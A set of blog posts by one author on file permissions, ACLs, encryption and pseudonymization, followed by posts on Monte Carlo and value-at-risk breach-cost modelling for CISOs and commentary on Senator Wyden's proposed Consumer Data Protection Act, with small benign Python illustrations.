All posts by Andy Green

Protect Your Data With Super Easy File Security Tricks!

Data security is an all-encompassing term. It covers processes and technologies for protecting files, databases, applications, user accounts, servers, network logins, and the network itself. But if you drill down a little, it’s easy to see that data security is ultimately about protecting a file somewhere on your system, whether on desktops or servers. While data security is a good umbrella term, we need to get into more detail to understand file security.

File Security and Permissions

As Microsoft reminds us, files (and folders or directories) are securable objects. They have access or permission rights controlling who can read, write, delete, or execute at a very granular level through Access Control Lists (ACLs). And in the Linux world, we have a similar, although far less granular, system of permissions.

Why have the concept of permissions in the first place?

Think of an enterprise computing environment as a semi-public place – you’re sharing a data space not with just anyone, but with other employees. So a file is not the equivalent of a box with a lock that shuts out everyone without the combination or key. (Well, there is encryption, but we’ll cover that below.) Instead, the assumption in a Windows, Linux, or other operating system environment is that you want to share resources.

The operating system’s file permissions are there to provide a broad way to limit what can be done. For example, I might want workers in another group to read our presentations, but I certainly don’t want them to edit anything. In that case, we’d specify – as shown below – read and write permission for users who belong to the group, and just read permission for everyone else.

In the Beginning, There Was Unix-Linux Permissions

Let’s look at a very simple permissioning system. It’s the classic Unix-Linux model, which provides basic read-write-execute permissions and a very simple method of deciding who those permissions apply to. It’s called the user-group-other model. Effectively, it divides the user community into three classes: the owner of the file (user), all those users belonging to groups that the owner is a member of (group), and finally everyone else (other). You can see this permission structure when you run an ls -l command:
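
You can also decode those rwx triplets yourself. Here’s a minimal Python sketch (my illustration, using the example file name from the chmod demos below) that reads a file’s mode bits the way ls -l displays them:

import os

mode = os.stat("my-stuff-2.doc").st_mode  # example file from the chmod demos below
for who, shift in (("user", 6), ("group", 3), ("other", 0)):
    bits = (mode >> shift) & 0o7  # each class gets its own 3-bit rwx field
    rwx = "".join(ch if bits & flag else "-"
                  for ch, flag in (("r", 4), ("w", 2), ("x", 1)))
    print(f"{who}: {rwx}")

For a file with mode 640, this prints user: rw-, group: r--, other: ---, which is exactly the rw-r----- string in the ls -l listing (minus the leading file-type character).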

How do you add or subtract a permission for user, group, or other? There’s the Linux chmod command. Suppose I decided to give users in groups I belong to access to my my-stuff-2.doc file, which I had been keeping private. I could do this:

chmod g+r my-stuff-2.doc

Or say I now want to take back and make private the secret-presentation.doc file, which I had allowed other groups to view and update:

chmod g-rw secret-presentation.doc

The Unix-Linux permission model is simple and well-suited for server security, where there are system-level applications accessed by a few privileged users. It is not meant for a general user environment. For that you’ll need ACLs.

What are Access Control Lists?

Windows has a far more complex permissioning system than Linux. It allows you to define a permission for any Active Directory user or group, each of which is represented internally by a unique number known as a SID (security identifier). Windows ACLs consist of a SID and another number representing the associated permissions — read, write, execute, and more — called an access mask. The SID and the mask together are referred to as an access control entry, or ACE.
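
Conceptually, checking an ACL comes down to matching the requester’s SIDs against each ACE and testing the access mask. Here’s a toy Python sketch of that idea (a simplification that ignores deny ACEs, ACE ordering, and inheritance, which the real Windows algorithm handles):

from dataclasses import dataclass

READ, WRITE, EXECUTE = 0x1, 0x2, 0x4  # toy access-mask bits, not the real Windows constants

@dataclass
class ACE:
    sid: str   # SID of a user or group
    mask: int  # allowed rights, OR-ed together

def is_allowed(acl, requester_sids, wanted):
    # allow if some ACE for one of the requester's SIDs covers every wanted bit
    return any(ace.sid in requester_sids and (ace.mask & wanted) == wanted for ace in acl)

acl = [ACE("S-1-5-21-111-513", READ), ACE("S-1-5-21-111-1104", READ | WRITE)]
print(is_allowed(acl, {"S-1-5-21-111-513"}, READ))          # True
print(is_allowed(acl, {"S-1-5-21-111-513"}, READ | WRITE))  # False: no write ACE for that SID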

We’ve all seen the user-friendly representation of the ACE when we view a file or folder’s properties:

Four ACEs are shown for a file, and the access mask for the Administrator’s SID appears in human-readable form in the bottom pane.

Obviously, ACLs can make permissioning quite complex. In theory, you could have an ACE for each user that needs to access a file or folder. No, you shouldn’t do that! Instead, the preferred method is to assign users to a group and then combine all the groups that need access to a folder into a larger group. This umbrella group is then used in the ACL. I’ve just described AGLP (Account, Global, Local, Permission), which is the Windows-approved method for efficient file and folder permissioning.

So if an employee moves to another project (or leaves the company) and therefore no longer needs access, you simply remove that user from the Active Directory group without having to adjust the ACE in the specific folder or file.

Easy peasy in terms of file security management. And a sensible way to reduce security risks in an enterprise computing environment.

And Along Came File Encryption

If you’re paranoid, there is encryption, which is certainly a valid, if extreme, technique for addressing file security. It may be safe, but it’s a very impractical way to secure file data broadly. Windows supports encryption, and you can turn it on selectively for folders.

Technically, Windows uses both asymmetric and symmetric encryption. The asymmetric part decrypts the symmetric key that does the actual block encryption and decryption of the file. The user has access to the private part of the asymmetric key pair that gets the whole process started. And only the owner of the folder can see the unencrypted files.
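
The hybrid pattern itself is easy to sketch with Python’s pyca/cryptography package. To be clear, this illustrates asymmetric-wraps-symmetric in general, not how EFS is actually implemented:

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
file_key = AESGCM.generate_key(bit_length=256)  # the symmetric key does the bulk encryption

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped = private_key.public_key().encrypt(file_key, oaep)  # only the key owner can unwrap

nonce = os.urandom(12)
ciphertext = AESGCM(file_key).encrypt(nonce, b"spreadsheet contents", None)

# decryption starts by unwrapping the symmetric key with the private key
plaintext = AESGCM(private_key.decrypt(wrapped, oaep)).decrypt(nonce, ciphertext, None)

Lose the private key and the wrapped key is useless, which is why the certificate backup advice below matters.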

Obviously, with one user in control of the encryption, this does not lend itself to letting multiple users share access to files and folders. Add in the potential for losing the asymmetric encryption key, which is kept in a certificate, and you can have a self-made ransomware attack on your hands. And yes, you should back up encryption certificates!

Windows does allow you to set encryption on a folder. That doesn’t mean you should!

As we’ve been saying all along, the file system is where employees keep and share the content (spreadsheets, documents, presentations) that they’re working on right now. It’s their virtual desk, and adding a layer of encryption is like moving things around and making that desk even sloppier — no one likes that! — as well as being administratively difficult to manage.

Pseudonymization: Selective File Encryption

And this brings us to pseudonymization.

It’s a GDPR-approved technique for encoding personal data in order to reduce some of the burdens of this law.

The idea is to replace personal identifiers with a random code. It’s the same idea behind writers using pseudonyms to hide their identities. The GDPR says you can do this on a larger scale as a way to lessen some of the GDPR requirements.

Generally, there would have to be an intake system that would process the raw data identifiers and convert them to these special codes. And there would have to be a master table that maps the codes back into the real identifiers for those processes that need the original information.
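
A toy intake step might look like this in Python. The record is invented, and a real system would guard the master table as carefully as an encryption key:

import secrets

master_table = {}  # code -> real identifier, for authorized re-identification only

def pseudonymize(identifier):
    code = "SUBJ-" + secrets.token_hex(4)  # random code, like a writer's pseudonym
    master_table[code] = identifier
    return code

record = {"name": "Maria Schmidt", "zip": "10115", "notes": "renewal pending"}
record["name"] = pseudonymize(record["name"])
print(record)                        # identity hidden; the rest stays readable
print(master_table[record["name"]])  # authorized processes reverse the mapping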

Using this approach, employees could then work with pseudonymized files in which the identities of the data subjects would be hidden. The rest of the file, of course, would be readable.

Partial encryption is perhaps one way to think about this technique.

Like encryption, pseudonymization is considered a security protection measure (see the GDPR’s Article 32), and it’s also explicitly mentioned as a “data protection by design and by default” or PbD technique (see Article 25). It’s also considered a personal data minimization technique — very important to the GDPR.

Will pseudonymization spread beyond the EU’s GDPR and be adopted by the US in its own coming data privacy and security law?  We will see!

Best File Security Practices

Enterprise computing environments are designed to help employees get their work done. Sure there are built-from-the-ground-up secure operating systems, but they’re meant for top-secret government projects (or whatever Apple is working on next). For the rest of us, we have to learn to work with existing commercial operating systems, and find ways to minimize the risks of data security lapses.

Here are three easy-to-implement tips for boosting your file system security.

  1. Eliminate Everyone – The default Everyone group in Windows gives global access to a folder or file. You would think that companies would make sure to remove this group from a folder’s ACL. But in our most recent annual Data Risk Report, we discovered that 58% of the companies we sampled had over 100,000 folders open to every employee! Sure, you’ll need to grant Everyone if you’re sharing the folder over the network, but make sure to remove it from the ACL afterwards and then do the following RBAC analysis.
  2. Roll Your Own Role-based Access Controls (RBAC) – Everyone has a job or role in an organization, and each role has an associated set of access permissions to resources. Naturally, you assign similar roles to the same group, apply the appropriate permissions to that group, and then follow the AGLP method from above (see the toy sketch after this list). When implemented correctly, this should be easy to maintain while reducing security risks. Yes, it does require more than a little administrative overhead.
  3. Least Privilege Permissions – This is related to RBAC, but it involves focusing particularly on “appropriate” permissions. With the least privilege model, you pare down access to the minimum needed for the role. Marketing may need read access to a folder controlled by the finance department, but they shouldn’t be allowed to update a file or perhaps run some special financial software. Administrators need to be ruthlessly stingy when granting permissions with this approach.
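
To make the RBAC and least-privilege tips concrete, here’s the promised toy sketch in Python; the roles, folder, and rights are invented for illustration:

ROLE_PERMISSIONS = {  # least privilege: each role gets only what its job requires
    "finance":   {"finance-reports": {"read", "write"}},
    "marketing": {"finance-reports": {"read"}},  # can read the reports, never edit them
}

def can(role, resource, right):
    return right in ROLE_PERMISSIONS.get(role, {}).get(resource, set())

print(can("marketing", "finance-reports", "read"))   # True
print(can("marketing", "finance-reports", "write"))  # False

In a Windows shop, the roles become the global groups in the AGLP pattern, and the resource mapping becomes the domain local group that actually appears in the folder’s ACL.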

I lied. These tips are super-easy to understand, but not super-easy to implement! You’ll need some help …

We just happen to have a solution that will make these great tips easier to put into practice.


CEO vs. CISO Mindsets, Part IV: Monte Carlo Breach Cost Modeling for CISOs!

My main goal in this series is to give CISOs insights into CEO and board-level decision making so they can make a winning case for potential data security purchases. In my initial dive last time, I explained how CISOs should quantify two key factors involved in a breach: the frequency of attacks, and then the probability that the breach itself exceeds a certain cost threshold. Knowing these two ingredients (and that there are numbers or ranges of numbers you can assign to each) will earn you points with CEOs and CFOs.

It’s second nature for the top corporate honchos to make decisions under uncertainty: they are pros at placing the right bets and knowing the odds. And CISOs should understand the language of risk, and how to do some basic risk math.

Sure CEOs should also have basic knowledge of the amazing post-exploitation tricks hackers have at their disposal, and I’ll take that up in the next post. But I think the bigger gap to cover is getting CISOs up to speed on biz knowledge.

As a bonus for CISOs and tech execs for getting this far in the series, I’ve put together a wondrous Excel spreadsheet so that you can do your own, gasp, Monte Carlo-style modeling! You’ll truly impress CEOs in your next presentation by tweaking this simulation for your particular company and industry.

Let’s Be FAIR

I’m a fan of the FAIR Institute and its framework for analyzing risk. Sure, there’s lots of risk information on the Intertoobz, but the FAIR gang are excellent educators and guides into what is, ahem, a very wonky topic. You can go as deep as you want into the FAIR analysis, but as I described in the previous post, even a shallow dive can provide very useful results for making decisions.

At the first level of FAIR’s analysis, you need to look at the two factors I mentioned above. First, derive an exceedance loss curve for your particular industry or company. In my case, I was able to use a public healthcare dataset of breaches reported under HIPAA, and then apply results from a breach cost regression based on Ponemon’s breach survey.

I’m able to say what percentage of healthcare breaches fall above any given cost amount for a single incident.

By the way, a similar type of curve is also calculated by insurance companies for auto and home policies. It’s the same problem! For them, a large claim is similar to a costly data breach. Ultimately, insurance companies use loss exceedance curves to work out premiums that cover their costs and give them a profit. And we can think of the cost of a data security software license as a kind of premium companies pay to limit the loss from a breach accident.

Anyway, the second factor is the frequency or rate at which companies are breached. You can guesstimate an average rate, which is what I did last time for my hypothetical healthcare company.

This does bring up a more important point: what happens when you have limited real-world data? Thankfully, the FAIR approach allows for this, and there are techniques to combine or weight internal information collected by your infosec team — say, the frequency of successful SQL injections in the last 5 years — with any available public information from external sources such as the Verizon DBIR. This idea is partially covered in a video the FAIR people put together.

What do you do with both of these factors?

You multiply them: frequency × single loss = total loss. Well, it’s not quite that simple!

Exact formulas are generally not easy to come by for real-world scenarios. And that’s why you run a Monte Carlo (MC) simulation!

In an MC simulation, you “spin the dice” — using Excel’s built-in random number generator — to simulate an attack occurring. And then you spin the dice again to generate a possible loss for that attack. You tally the losses, rank them, and produce a curve representing the total exceedance losses for a given average frequency over a period of time.

In my MC simulation, I rolled the dice a few thousand times using an Excel spreadsheet with special Visual Basic macros I added. I modeled a healthcare company experiencing an average rate of four incidents over ten years, and a single loss curve based on the HIPAA dataset to produce the following total loss curve:

The total breach cost exceedance loss curve. The ultimate goal of the MC simulation!

This is really the goal of the simulation: you want a distribution or curve showing the sum of losses that occur when a random number of attacks happen over a given time period. Armed with this kind of analysis, imagine making a presentation to your CEO and CFO and confidently telling them: “There’s a 10% chance that our company will face a $35 million breach loss in the next 10 years.” Your CEO will henceforth look at you with loving C-level eyes.
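
If Excel and VBA aren’t your thing, the same experiment fits in a few lines of Python. This is a sketch with made-up parameters (Poisson arrivals and a Pareto-2 single-loss curve), not my fitted HIPAA numbers:

import numpy as np

rng = np.random.default_rng(0)
ALPHA, SCALE = 2.0, 3e6                # illustrative Lomax (Pareto-2) shape and scale
RATE, YEARS, TRIALS = 0.4, 10, 10_000  # about four incidents per decade, on average

def one_decade():
    n = rng.poisson(RATE * YEARS)                # random number of incidents this decade
    return (SCALE * rng.pareto(ALPHA, n)).sum()  # sum the single-incident losses

totals = np.sort([one_decade() for _ in range(TRIALS)])
for p in (0.5, 0.1, 0.05, 0.01):  # exceedance probabilities
    print(f"P(total 10-year loss > ${totals[int((1 - p) * TRIALS)] / 1e6:.1f}M) = {p}")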

The key lesson from FAIR is that you can quantify data breach risk to produce a good enough back-of-the-envelope calculation that’s useful for planning. It’s not perfect by any means, but it’s better than flying blind. Think of it as kind of a thought experiment, similar to answering a Google-style interview question. And as you go deeper down into FAIR, the exercise of analyzing what data is at risk, its value, and red-teaming possible breach scenarios is valuable for its own sake! In other words, you might …  learn things you didn’t know before.

Value at Risk for CISOs

My analysis of the HIPAA data involved some curve wrangling using off-the-shelf stats software. I was able to fit the dataset to a power-law style curve — wonks can check out this Pareto distribution. Heavy-tailed curves, which are very common for breach stats (and other catastrophe data), can be approximated by power-law-like formulas in the tail.

That’s good news!

It’s easier to work with power laws when doing simulations and crunching numbers, and the tail is really the most interesting part for planning purposes — it’s where the catastrophes are found. Sure, CFOs and CEOs look at average losses, but they’re far more focused on the worst cases.

After all, the C-levels are charged with keeping the company going even when the breach equivalent of a Hurricane Sandy arrives. So they have to be prepared for these extreme events, and that means making the investments that limit the catastrophic losses found in the tail.

And that brings us to Value at Risk or VaR.

Let’s just demystify it first. It’s really a single number that tells you how bad things can get. A 90% VaR for breach losses is the number that’s greater than all but 10% of losses. A 95% VaR is greater than all but 5%.

In the curve above, you get the VaR by going to the y-axis, finding the 5% or 1% value, following the horizontal line to the curve, and then dropping down to the x-axis to read off the value. It’s really an exercise in doing a reverse lookup. Hold that thought.

You run my MC simulation after inputting an average frequency rate and a single loss curve (or really its tail) based on a real-world dataset, and then let it generate thousands of possible scenarios. For VaR purposes, you and your C-levels are very interested in a select few scenarios — the ones that show up at the top of a ranked list.

Below you can see specific sample runs from my Excel spreadsheet for 90%, 95%, 97.5%, and 99% VaRs. So at the end of 10 years, the 99% VaR is over $120 million, and it turns out to involve three events — notice the jumps.

Notice the huge jumps in the 97.5% and 99% curves. It’s a feature (not a bug) of heavy-tailed curves.

The Mysteries of the Heavy-Tailed Dragon 

I lied. It turns out that for heavy-tailed distributions you really don’t have to run an MC simulation to come up with VaR numbers. There is a formula!

I’ll hint at what it might be, but to see what it is in the case of a Pareto distribution, you’ll have to download the spreadsheet. The VaR formula enables you to do a quick napkin calculation. The MC simulation is still useful to verify the formula with simulated data based on your modeling.

For background on all this, there’s a surprisingly readable presentation on this mathy subject written by two statistics guys. They describe in simple terms some of the mysterious properties of these heavy-tailed beasts. Yes, dragons are magical. One of their stranger powers is that these beasts will womp you with a single crushing event. You can see that in the 97.5% and 99% VaRs in the 10-year simulation above. Notice there’s one huge jump in both cases.

Another strange and magical thing is that a good VaR approximation can be calculated easily for many heavy-tailed datasets. I suggested it above: you can think of the VaR as a reverse lookup — in math-speak, the inverse of a formula. In the case of multiple losses occurring at a given rate or frequency over a time period, the VaR can be calculated with a slight tweak to the inverse Pareto distribution. You’ll have to check out my Excel spreadsheet for the true formula.
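
I won’t spoil the spreadsheet, but the single-big-jump behavior gives a standard heavy-tail approximation you can sanity-check it against. The sketch below is my reading of that textbook result for Pareto-2 severities, not necessarily the spreadsheet’s exact formula:

def approx_total_var(p, alpha, scale, rate, years):
    """Approximate p-quantile of total losses over the period, using the
    heavy-tail rule P(total > x) ~= expected_events * P(single loss > x)."""
    expected_events = rate * years
    return scale * ((expected_events / (1.0 - p)) ** (1.0 / alpha) - 1.0)

print(f"${approx_total_var(0.99, 2.0, 3e6, 0.4, 10) / 1e6:.0f}M")  # illustrative parameters only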

What else can you do with all this probability information?

You can start working out whether an investment in data security software will pay for itself — assuming the software prevents the attack. In my spreadsheet, I let you calculate a break-even percentage based on a yearly security investment. And I’ve also worked out the average payback — how much money your software defenses will save you, on average.

Data security software pays for itself! Here’s a worked-out example for a $400,000/year investment, assuming a heavy-tailed Pareto curve based on HIPAA breach data.

Let’s call it a day.

I’ll have a few more thoughts on VaR in the next post, and then we’ll get into basic knowledge that CEOs should know about post-exploitation.

I’ll end this post with a lyric from the greatest band ever, Abba of course, which I think brilliantly summarizes the devastating power of heavy-tailed breach loss distributions:

But I was a fool
Playing by the rules
The gods may throw a dice
Their minds as cold as ice
And someone way down here
Loses someone dear

Thanks Benny for this great insight into breach costs.

Download the breach cost modeling spreadsheet today!

Wyden’s Consumer Data Protection Act: How to Be Compliant

Will 2019 be the year the US gets its own GDPR-like privacy law? Since my last post in this series, privacy legislation has become more likely to pass. Leaders from both parties are now saying they will focus on privacy in 2019. Consider yourself warned!

I’ll continue my journey from last time into the Wyden legislation, since it’s a good baseline. Sure, there are other bills, but they share some common elements. I’ve already discussed Wyden’s broader definition of personally identifiable information (PII) and its data risk assessment requirements in the last post.

In this round, we’ll get into the bill’s stronger consumer rights (involving the right to access and correct) and discuss the baseline security requirements that are mentioned. As before, I’ll add my predictions as to what to expect. And I’ll conclude with some ideas for getting ahead of the curve, so when we inevitably have a new law (in one form or another), you’ll be compliant from day one.

Right to Access

It shouldn’t come as a surprise that whatever legislation is ultimately approved will give consumers more power over their data. This was roughly the consensus from the Senate hearings a few months back. Of course, the devil is in the details.

The Wyden bill gives consumers more control over how their data is shared — it calls for opt-out when sharing with third parties. This legislation also allows consumers to see what personal data is held by companies, and asks for a process to allow them to correct inaccurate data.

In the Wyden bill, I did not see a “right to be forgotten”. Instead there is some language about minimization and asking companies to assess the risk involved in data duration. During the Senate hearings in September, there was obviously some resistance from the usual suspects about losing the power to keep tabs on online users forever. However, at least one executive from a major hardware manufacturer of cell phones, laptops, and pad computing devices was open to the idea (see the response to question 4).

From the Wyden bill. You’ll be able to make subject access requests (SARs).

Prediction: The recent California privacy law does have a “right to erase” requirement, but with some exceptions, including this wide-open possibility: “Used solely for internal uses that are reasonably aligned with the expectations of the consumer.” My guesstimate is that the US will have a weaker form of the “right to be forgotten”, with enough wiggle room to allow search-engine and social media companies to continue their business practices. I think we’ll likely see stricter language on data retention that puts limits on how long companies can keep data when there’s no longer a real business need. This might be a more realistic way to implement data erasure, but it would force companies to keep track of metadata — when the data was collected and the reasons for collecting it.

Data Security Baseline

The current crop of Congressional legislation is focused on privacy. To no one’s surprise, strong data security ideas — restricted access, multi-factor authentication, encryption, retention limits, annual pen-testing, incident response, etc. — are not finding their way into these bills. What I’m seeing, at least in the Wyden bill, is boilerplate language about “technological and physical safeguards” to reduce overall risk.

However, these bills do leave additional rule-making to a regulatory agency — the Federal Trade Commission — and so tougher data security rules could be coming down the road.

Prediction: In the first round of privacy legislation, we’re not going to get the tougher security rules that the GDPR has — for example, its Article 32, Security of Processing, and its breach reporting Articles 33 and 34. Instead, we’ll have required risk assessments and annual reporting. For example, the Wyden legislation calls for a certified data protection report (for companies with revenues above $1 billion) to prove they are protecting the privacy and security of the data they hold. When there are enforcement actions, a company can minimize penalties by using these reports to show it has been doing its homework.

Next Steps

Data privacy and security changes are coming to the US. For many companies that are following common standards, such as PCI DSS, ISO 27001, or CIS Critical Security Controls, the coming legal requirements should not be too much of a stretch. Keep in mind that these laws are taking standard IT security ideas and now making them mandatory.

And there will be fines! The Wyden bill, for example, specifies civil penalties of up to 4% of total revenue.

If you’re starting from scratch or want to revisit your existing programs, here are three areas that are worth adding to your  IT New Year resolutions list:

  • Data classification of file systems – You can’t protect what you don’t know you have. Data classification is an essential part of any data security program. In fact, the aforementioned standards have data classification requirements, which typically go under the broader name of asset identification. For file systems, we’re talking about scanning the core elements — folders and files — and searching for relevant data as defined by the laws. No, this can’t be done easily. You’ll need special automated software to efficiently index the file system and pattern match on the appropriate PII (a toy sketch follows this list).
  • Risk Assessments – You’ve indexed and classified the data. The next step is to determine what’s at risk. With file data, we’re interested in who owns the resource, who’s accessing it, and most importantly who should be accessing it. We know from many years’ worth of hacking incidents that once attackers are in and steal the credentials of ordinary users, they too often have more than enough file privileges to access and exfiltrate sensitive data. The goal of data-oriented risk assessments is to find these overly permissioned folders, and then remediate by restricting access to appropriate users. Risk assessments that are data focused are far better at identifying the root cause of incident risk — the credit card or customer information contained in folders with “Everyone” permission!
  • Incident Response – While the current legislation may not have a “72-hour reporting” rule, it’s still important to have your ducks in a row. You should have a response program in place that can quickly identify potentially abnormal activity and notify IT in a timely way. Integrated security software that can classify data, identify permissions, and log all file activity is in a far better position to notify IT when there truly is unusual activity associated with hackers.
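
To give a flavor of what that classification software does (real products are far more sophisticated about file types, performance, and accuracy), here’s the promised toy sketch: a Python scan that walks a tree and pattern-matches two common identifiers. The share path is hypothetical:

import os
import re

PATTERNS = {
    "ssn":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
}

def scan(root):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                text = open(path, encoding="utf-8", errors="ignore").read()
            except OSError:
                continue
            hits = sorted(label for label, rx in PATTERNS.items() if rx.search(text))
            if hits:
                print(path, hits)  # candidate for classification and access review

scan(r"\\fileserver\hr-share")  # hypothetical UNC path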

While you’re mulling over this series and starting to revamp your own security programs in 2019, we’ll continue to keep you posted on what’s going on in Congress.

Wyden’s Consumer Data Protection Act: Preview of US Privacy Law

The General Data Protection Regulation (GDPR) has, for good reason, received enormous coverage in the business and tech press in 2018. But wait, there’s another seismic privacy shift occurring, and it’s happening here in the US. There is now a very good chance that significant data privacy legislation will come to the US soon. I’ll go out on a limb, and say in 2019. But if not next year, then certainly in 2020.

Yes, we’ll likely see GDPR-lite privacy requirements becoming yet another compliance consideration for US companies in the very near future.

No, hell has not frozen over. In fact, over the years there have been various US data security and privacy laws kicking around Congress. With GDPR becoming a reality, and some well publicized privacy lapses making headlines, Silicon Valley companies decided to back federal privacy legislation, rather than having to deal with separate state initiatives.

In September, AT&T, Google, Amazon, Twitter and Apple testified in Senate hearings in favor of a federal privacy law, with each offering its own framework. They were essentially calling for a simplified version of the GDPR. In short, they agreed to stricter consumer controls over personal data, including a right to deletion/correction and explicit opt-in for the collection and sharing of consumer data.

Let’s Hit the Law Books

Congress has also gotten busy and started introducing its own newly cooked-up batch of privacy legislation, with Senators Blumenthal and Wyden taking the lead. There are other Senators weighing in as well.

So what’s in these proposed laws? Well, Blumenthal’s has not been published, but Wyden’s fully formed privacy bill is available on the Senate website.

These are big pieces of legislation — though not nearly as complex as the GDPR — so I don’t blame you for not immediately diving in and trying to decipher them. However, I’ve generously volunteered to do the heavy lifting, and have spent a few afternoons looking for the good parts, so to speak. While we won’t know what the final US privacy law will look like for at least a few months, I’m betting that some of the key elements of the Wyden bill will make the cut.

In this two-part series, I’ll explain what I think a future US law will look like and come up with some short-term next steps that can be addressed by your CSO and CIO, sooner rather than later.

If I had to summarize, I’d say we can expect a far broader definition of personally identifiable information (PII) than what’s in most state laws, stronger consumer rights and protections over this data (opt-in, correct, delete), obligations to analyze data and assess risks, a minimum baseline for data security, and, last but not least, significant fines and other penalties for not following the law.

What won’t be in the coming US privacy law? If I’m reading the tea leaves correctly, there won’t be a breach notification rule like the GDPR has. Not yet anyway.

That’s the big picture view. So let’s get into some of the details, and in the spirit of end-of-year prognostications, I’ll add my predictions for what I think will ultimately become part of the privacy law of the land in the US.

1. Personal Information

We’re going to get a more modern version of PII. Period. Wyden’s Consumer Data Protection Act (CDPA) defines personal information as data “that is reasonably linkable to a specific consumer or consumer device.” This is about as encompassing as you can get, and it would include quasi-identifiers — for example, birthdate, zip code, and gender — that I wrote about once upon a time.

On the other hand, the personal information definition in, say, Senator Thune’s proposed data security law is not nearly as abstract, and instead lists all the usual identifiers – name, address, account, license. It does call out, though, internet-era identifiers and information – user names, passwords, and bio data.

Keep in mind that even traditional identifiers, such as license numbers, can vary by state, and I won’t even get into financial account numbers. To comply with a federal privacy law, you’ll need sophisticated pattern matching to deal just with legacy identifiers spread out across your file system.

What’s a possible solution to the identifier chaos in terms of legal language? The US does have a hybrid model for PII with the HIPAA law, and its definition of protected health information (PHI). All your health information is technically under HIPAA, but to make it easier for insurers and other covered entities, the government created a loooong list of explicit safe harbor identifiers. In short, if you protect these 18 identifiers, you’re in compliance.

Prediction: I’ll boldly predict that we won’t see a GDPR-style definition of personal information, like what’s in the Wyden bill. Instead we’ll get a list approach, but one that includes basic online identifiers — user names, passwords, handles, PINs, etc. — as well as the legacy ones. In any case, most companies will have to up their game to track and classify data based on this longer list.

2. Risk Assessments and Compliance Reports

Definition of risk assessment from Wyden’s CDPA.

The Wyden legislation makes risk assessments a centerpiece of its privacy requirements. The law goes into some detail about assessments needing to be made based on a few factors, including data minimization, storage duration, and accessibility. It restricts these assessments, though, to automated decision making – that is, algorithms. But the Thune legislation, as just one other example, has more general risk assessment requirements.

Additionally, the proposed Wyden law asks larger companies (above $1 billion in revenue) to produce an annual data protection report to show that they have “reasonable cyber security and privacy policies” in place. Of course, risk assessments are a standard part of reasonable data security and privacy programs.

The Wyden law, by the way, also requires the CEO, the chief privacy officer (CPO), and the chief information officer (CIO) to certify the report!

Prediction: We will see explicit language about risk assessments and data security policies (minimization, access, etc.). We are past the self-policing phase of data privacy and security, and this new law will force US companies to prove that their IT departments are doing what they claim. For a sneak preview of what might be in store, check out the NYDFS Cyber Regulation, which gets into the nitty-gritty details of security program requirements, including an annual report summarizing these efforts.

We’ll continue in the next post with more of what to expect in next year’s US privacy law. And I’ll provide some ideas for how to get ahead of the curve!


CEO vs. CISO Mindsets, Part III: Value at Risk For CISOs

To convince CEOs and CFOs to invest in data security software, CSOs have to speak their language. As I started describing in the previous post, corporate decision makers spend part of their time envisioning various business scenarios, and assigning a likelihood to each situation. Yeah, the C-level gang is good at poker, and they know all the odds for the business hand they were dealt.

For CSOs to get through to the rest of the C-suite, they’ll need to understand the language of risk and chance. It’s expecting too much for upper-level non-IT executives to appreciate, say, operational reports on the results of vulnerability scans or how many bots were blocked per month. That’s definitely helpful for IT, but the C-suite is focused on far more fundamental measures.

They would want to know the answer to the following question: can you tell me the chances of a catastrophic breach or cyber event, perhaps costing over $10 million, occurring in the next 10 years? Once CEOs have this number, they can price various options to offset the risk and keep their business on track.

I suspect most IT departments, except in the largest companies where formal catastrophe planning is part of their DNA, would be hard pressed to come up with even a rough estimate of this number.

In this post, I’ll guide you into doing a back-of-the-envelope calculation to answer this question. The approach is based on the FAIR Institute’s risk analysis model. Their core idea is that you can assign numbers to cyber risk using available data sources — both internal and external. In other words, you don’t have to fly completely blind in the current cyber threat environment.

FAIR (and other approaches as well) effectively breaks down the cost of a data breach into two components: the severity or magnitude of a single incident, and the frequency at which these cyber events occur over a given period of time. Simple, right?

The FAIR approach in one picture: loss frequency × loss magnitude = average loss.

If you’re thinking that you can multiply the separate averages of each — frequency and severity — to obtain an average for yearly cyber losses, you’re right (with some qualifications). The advantage of the FAIR model is that it allows you to go as deep as you want, depending on your resources, and get more granular information beyond broad averages.

I should add that FAIR is not re-inventing the risk wheel. Instead, it has systemized techniques used principally by banks and insurance companies, which have long had to handle catastrophes, financial crises, and natural disasters, and know how much to set aside for the proverbial rainy day.

Mastering Data Disasters: How Bad Is the Risk?

In the last post, I took two years of HIPAA breach reporting data and derived what I called an exceedance loss curve. That’s a fancy way of saying I know the percentiles (or quantiles in risk-speak) for various cyber costs. For this post, I rearranged the curve to make it a bit more intuitive, and you can stare at the graph below:

We finally have a little more insight into answering the question a CEO of a health insurer might ask: how bad can it get?

Answer: Pretty bad!

The top 10% of healthcare cyber incidents can be very costly, starting at $8 million per attack. Yikes.

It’s also interesting to analyze the “weight” or average cost of the last 10% of this severity curve. As we’ll soon see, this is a power-law-ish, Pareto-style distribution that I talked about back here.

I did a quick calculation using the HIPAA data: the top 10% (or 90th percentile) of incidents, representing under 30 data points, carries a disproportionate 65% of the total cost of all losses! With heavy-tailed curves, we need to focus on the extremes or tail because that’s where all the oomph is.

If we were to do a more sophisticated analysis along the lines of FAIR, we would then take the above healthcare loss severity distribution and merge it with both internal loss data (if available) and a risk profile based on, perhaps, a survey of company infosec experts.

Naturally, it would be very helpful to conduct a data risk assessment to discover how much sensitive data is spread out across your file systems, and their associated permissions. This would be fed into the risk formulas.

There are some math-y methods to combine all this together using various weights, and you can learn more about this in Doug Hubbard’s RSA presentation, or (shameless plug) in his book: How to Measure Anything In Cybersecurity Risk.

Healthcare Incident Rates and the Ultimate Average

For our purposes, let’s take the HIPAA reporting data as a good representation of how bad breach costs can be for our imaginary healthcare insurance company.

Now let’s deal with the next component. For the frequency or rate at which incidents occur, you may want to rely more heavily on your own internal data. There are also external datasets. For example, the Identity Theft Resource Center tracks breach incidents by industry sector, and its healthcare numbers can guide you in your guesstimating.

Let’s say, for argument’s sake, that our insurer has logged one significant cyber incident every four years, for an average rate of .25 incidents per year.

Drumroll … I multiply the average incident rate, .25, by the average loss or severity cost of $4.2 million (from the above curve) to come up with an average annual loss of about $1 million.

